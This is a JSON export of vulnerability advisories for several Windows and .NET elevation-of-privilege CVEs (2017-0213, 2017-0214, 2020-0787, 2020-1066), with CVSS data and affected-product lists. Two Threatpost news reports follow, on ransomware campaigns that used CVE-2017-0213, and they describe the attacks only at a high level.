{"redhatcve": [{"lastseen": "2022-07-07T17:40:24", "description": "An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level.To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program.The update addresses the vulnerability by correcting how .NET Framework activates COM objects., aka '.NET Framework Elevation of Privilege Vulnerability'.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-29T09:20:54", "type": "redhatcve", "title": "CVE-2020-1066", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1066"], "modified": "2022-07-07T12:24:31", "id": "RH:CVE-2020-1066", "href": "https://access.redhat.com/security/cve/cve-2020-1066", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:59:35", "description": "An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level.To exploit the vulnerability, an attacker would first have to access the local machine, and 
then run a malicious program.The update addresses the vulnerability by correcting how .NET Framework activates COM objects., aka '.NET Framework Elevation of Privilege Vulnerability'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T23:15:00", "type": "cve", "title": "CVE-2020-1066", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1066"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:3.0"], "id": "CVE-2020-1066", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1066", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-13T16:00:32", "description": "An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links, aka 'Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability'.", "cvss3": {"exploitabilityScore": 
1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-12T16:15:00", "type": "cve", "title": "CVE-2020-0787", "cwe": ["CWE-269", "CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2020-0787", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0787", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:36", "description": "Windows COM in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when Windows fails to properly validate input before loading type libraries, aka \"Windows COM Elevation of Privilege Vulnerability\". 
This CVE ID is unique from CVE-2017-0213.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0214", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0214", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0214", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:35", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0214.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0213", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0213", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}], "mscve": [{"lastseen": "2021-12-06T18:25:11", "description": "An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level.\n\nTo exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program.\n\nThe update addresses the vulnerability by correcting how .NET Framework activates COM objects.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mscve", "title": ".NET Framework Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1066"], "modified": "2020-05-14T07:00:00", "id": "MS:CVE-2020-1066", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1066", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege exists in Windows COM Aggregate Marshaler. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.\n\nTo exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. 
a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running.\n\nThe update addresses the vulnerability by correcting how Windows COM Marshaler processes interface requests.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mscve", "title": "Windows COM Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-09-12T07:00:00", "id": "MS:CVE-2017-0213", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0213", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-06T18:25:12", "description": "An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. 
An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe security update addresses the vulnerability by correcting how Windows BITS handles symbolic links.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-10T07:00:00", "type": "mscve", "title": "Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2020-03-10T07:00:00", "id": "MS:CVE-2020-0787", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-08-24T21:45:54", "description": "A group of \u2018script kiddies\u2019 tied to Iran are targeting companies worldwide with internet-facing Remote Desktop Protocol (RDP) ports and weak credentials in order to infect them with Dharma ransomware.\n\nThe [Dharma malware](<https://threatpost.com/keys-for-dharma-ransomware-released/124024/>) (also known as Crysis) [has been 
distributed](<https://threatpost.com/next-gen-ransomware-packs-a-human-punch-microsoft-warns/153501/>) as a ransomware-as-a-service (RaaS) model since at least 2016. While the ransomware was previously used by advance persistent threat (APT) actors, its source code surfaced in March 2020, making it available to a wider breadth of attackers. That is the case with this latest Iran-linked threat group, which researchers say is unsophisticated and has been targeting companies across Russia, Japan, China and India with the ransomware since June.\n\n\u201cThe fact Dharma source code has been made widely available led to the increase in the number of operators deploying it,\u201d Oleg Skulkin, senior digital forensics specialist with Group-IB, said [in an analysis](<https://www.group-ib.com/media/iran-cybercriminals/>) of the attacks posted Monday. \u201cIt\u2019s surprising that Dharma landed in the hands of Iranian script kiddies who used it for financial gain, as Iran has traditionally been a land of state-sponsored attackers engaged in espionage and sabotage. Despite that these cybercriminals use quite common tactics, techniques and procedures they have been quite effective.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe threat actors are unsophisticated because they use publicly available tools both to obtain initial access and move laterally \u2013 rather than using custom malware or post-exploitation frameworks, Group-IB senior DFIR analyst Oleg Skulkin told Threatpost.\n\n\u201cThe threat actors use Persian language for Google searches on compromised servers and download tools from Iran-linked Telegram groups,\u201d Skulkin told Threatpost. \u201cIn addition, Group-IB experts saw the threat actors\u2019 attempt to brute-force accounts on an Iranian video streaming service.\u201d\n\nThe attackers in this campaign first would scan ranges of IPs for hosts that contained these vulnerable RDP ports and weak credentials, researchers said. 
They did so using scanning software called Masscan (which has previously been utilized by [bad actors like Fxmsp](<https://threatpost.com/notorious-hacker-fxmsp-outed/157275/>)).\n\nOnce vulnerable hosts were identified, the attackers deployed [a well-known RDP](<https://www.wilbursecurity.com/2019/10/rdp-honeypotting/>) brute force application called NLBrute, which has been sold on forums for years. Using this tool, they were able to brute-force their way into the system, and then check the validity of obtained credentials on other accessible hosts in the network.\n\nIn some attacks, attackers also attempted to elevate privileges using an exploit for an elevation privilege flaw. This medium-severity flaw ([CVE-2017-0213](<https://nvd.nist.gov/vuln/detail/CVE-2017-0213>)), which affects Windows systems, can be exploited when an attacker runs a specially crafted application.\n\nPost compromise, \u201cinterestingly, the threat actors likely didn\u2019t have a clear plan on what to do with the compromised networks,\u201d said researchers, showing their lack of sophistication. In different attacks, attackers would download various publicly-available tools to perform reconnaissance or move laterally across the network.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/24102642/table-1%40x.jpg>)To scan for accessible hosts in the compromised network, for instance, they used publicly-available tool Advanced Port Scanner. Other tools were downloaded by the attackers from Persian-language Telegram channels, researchers said.\n\n\u201cFor instance, to disable built-in antivirus software, the attackers used Defender Control and Your Uninstaller,\u201d said researchers. 
\u201cThe latter was downloaded from Iranian software sharing website \u2014 the Google search query in Persian language \u201c\u062f\u0627\u0646\u0644\u0648\u062f \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 youre unistaller\u201d was discovered in the Chrome artifacts.\u201d\n\nAttackers would then move laterally across the network and deploy the Dharma variant executable, encrypt data, and leave a ransom note for the victim. Researchers said hackers typically demanded a ransom between 1 to 5 BTC (worth between 12,000 to 59,000 USD at the time of writing).\n\nResearchers said that, though the exact number of victims in this campaign is unknown, the discovered forensic artifacts revealed that the threat actors in this campaign are \u201cfar behind the level of sophistication of big league Iranian APTs.\u201d\n\n\u201cThe newly discovered hacker group suggests that Iran, which has been known as a cradle of state-sponsored APT groups for years, now also accommodates financially motivated cybercriminals,\u201d according to Group-IB researchers.\n\nResearchers said part of this change may be attributed to the pandemic exposing a number of vulnerable hosts \u2013 with many employees working remotely \u2013 making an extremely popular attack vector for cybercriminals. Therefore, the default RDP port 3389 should be closed if not in use, they suggested.\n\n\u201cAs the attackers usually need several attempts to brute force passwords and gain access to the RDP, it is important to enable account lockout policies by limiting the number of failed login attempts per user,\u201d said researchers.\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. 
Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-24T15:23:37", "type": "threatpost", "title": "Iran-Linked 'Newbie' Hackers Spread Dharma Ransomware Via RDP Ports", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2020-08-24T15:23:37", "id": "THREATPOST:22AA852BEEA43B18D4341D7ADA922536", "href": "https://threatpost.com/iran-linked-newbie-hackers-spread-dharma-ransomware-via-rdp-ports/158580/", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-06T21:58:42", "description": "A recent slew of related ransomware attacks on top videogame companies has been associated with the notorious Chinese-linked APT27 threat group, suggesting that the advanced persistent threat (APT) is swapping up its historically espionage centralized tactics to adopt ransomware, a new report says.\n\nResearchers noticed the \u201cstrong links\u201d to APT27 when they were brought in as part of incident response for ransomware activity that affected several major gaming companies globally last year as part of a supply-chain attack. Details of these incidents (including specific company names and the timeline) are scant. However, while researchers told Threatpost that they could not name the specific gaming companies attacked, they said that five companies were affected. 
What\u2019s more, two of the affected companies are \u201camong the largest in the world,\u201d they said.\n\nAPT27 (also known as Bronze Union, LuckyMouse, and Emissary Panda), [is believed to operate from the People\u2019s Republic of China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>) and has been around since 2013, researchers said. The group has historically leveraged publicly available tools to access networks with an aim of collecting political and military intelligence. And, it\u2019s previously been focused on cyberespionage and data theft, rather than monetary profit.\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\n\u201cPreviously, APT27 was not necessarily focused on financial gain, and so employing ransomware-actor tactics is highly unusual. However this incident occurred at a time where COVID-19 was rampant across China, with lockdowns being put into place, and therefore a switch to a financial focus would not be surprising,\u201d according to researchers with Profero and Security Joes, [in a joint Monday analysis](<https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf>) [PDF].\n\n## **The Supply-Chain Attack**\n\nThe initial infection vector for the attack was through a third-party service provider, that had been previously infected through another third-party service provider, researchers said.\n\nUpon further investigation into the security incident, researchers discovered malware samples linked to a campaign from the beginning of 2020, [called DRBControl](<https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia>). 
Trend Micro researchers who previously discovered this campaign noted that it had links to APT27 and the [Winnti supply-chain specialist gang](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>). The hallmarks of the DRBControl backdoor attack were that it hit gambling companies, and used Dropbox for command-and-control (C2) communications.\n\nProfero and Security Joes researchers discovered a \u201cvery similar sample\u201d of DRBControl in the more recent campaign (which they dubbed the \u201cClambling\u201d sample) \u2013 though this variant lacked the Dropbox capabilities.\n\nResearchers found that DRBControl \u2013 as well as a PlugX sample \u2013 was then loaded into memory using a Google Updater executable, which was vulnerable to DLL side-loading (side-loading is the process of using a malicious DLL to spoof a legitimate one, and then relying on legitimate Windows executables to execute the malicious code). Both samples used the signed Google Updater, and both DLLs were labeled goopdate.dll, researchers said.\n\n\u201cFor each of the two samples, there was a legitimate executable, a malicious DLL and a binary file consisting of shellcode responsible for extracting the payload from itself and running it in memory,\u201d said researchers.\n\nAfter the threat actors gained a foothold onto the company systems through the third-party compromise, an ASPXSpy webshell was deployed, to assist in lateral movement.\n\nAnother process that stood out in this incident was the encryption of core servers using BitLocker, which is a drive encryption tool built into Windows, said researchers.\n\n\u201cThis was particularly interesting, as in many cases threat actors will drop ransomware to the machines, rather than use local tools,\u201d they said.\n\n## **APT27 Clues**\n\nResearchers observed \u201cextremely strong links\u201d to APT27 in terms of code similarities, and tactics, techniques and procedures (TTPs).\n\nResearchers for instance 
said that they found similarities between the DRBControl sample and older confirmed APT27 implants. In addition, a modified version of the ASPXSpy webshell used in the campaign was previously seen in APT27-attributed cyberattacks. And, alongside the discovered backdoor, researchers also found a binary responsible for escalating privileges by exploiting CVE-2017-0213, a [Windows COM elevation-of-privilege vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-0213>) patched in May 2017 that APT27 has used before.\n\n\u201cAPT27 has been known to use this exploit to escalate privileges in the past; with one incident resulting in a cryptominer being dropped to the system,\u201d said researchers.\n\nBeyond the arsenal of tools matching up to previous APT27 operations, researchers noted code similarities with previous APT27 campaigns; and, the domains used in this operation were matched to other operations linked to APT27 previously, Omri Segev Moyal, CEO of Profero, told Threatpost.\n\nResearchers also pointed to similarities in various processes used within the attack that link back to previous APT27 attacks, including the group\u2019s method of using the number of arguments to execute different functions, and the usage of DLL side-loading with the main payload stored in a separate file.\n", "cvss3": {}, "published": "2021-01-05T15:26:12", "type": "threatpost", "title": "Major Gaming Companies Hit with Ransomware Linked to APT27", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2021-01-05T15:26:12", 